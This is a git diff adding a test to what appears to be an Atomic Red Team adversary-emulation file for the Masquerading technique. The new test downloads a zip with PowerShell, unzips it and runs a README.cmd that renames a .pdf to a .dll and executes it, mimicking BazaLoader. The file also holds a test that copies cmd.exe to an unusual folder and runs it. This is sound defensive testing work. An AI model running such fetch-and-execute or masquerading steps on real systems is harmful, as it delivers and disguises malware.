diff --git a/atomics/T1036/T1036.yaml b/atomics/T1036/T1036.yaml
index 8f9029d1..b089475f 100644
--- a/atomics/T1036/T1036.yaml
+++ b/atomics/T1036/T1036.yaml
@@ -2,7 +2,7 @@ attack_technique: T1036
 display_name: "Masquerading"
 atomic_tests:
 - name: System File Copied to Unusual Location
-  auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
+  auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
   description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.
   supported_platforms:
   - windows
@@ -11,4 +11,28 @@ atomic_tests:
       copy %WINDIR%\System32\cmd.exe /Y %ALLUSERSPROFILE%\cmd.exe
       start %ALLUSERSPROFILE%\cmd.exe
     cleanup_command: del %ALLUSERSPROFILE%\cmd.exe >nul 2>&1
-    name: command_prompt
\ No newline at end of file
+    name: command_prompt
+- name: Malware Masquerading and Execution from Zip File
+  description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
+  supported_platforms:
+  - windows
+  input_arguments:
+    url:
+      description: Location of zip file
+      type: Url
+      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip
+  dependencies:
+  - description: Zip file must be present.
+    prereq_command: |
+      if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url}
+  executor:
+    command: |-
+      Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
+      cd $env:userprofile\Downloads\T1036
+      cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null
+    cleanup_command: |-
+      taskkill /IM Calculator.exe /f >$null 2>$null
+      Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore
+    name: powershell
diff --git a/atomics/T1036/bin/T1036.zip b/atomics/T1036/bin/T1036.zip
new file mode 100644
index 00000000..878c01bf
Binary files /dev/null and b/atomics/T1036/bin/T1036.zip differ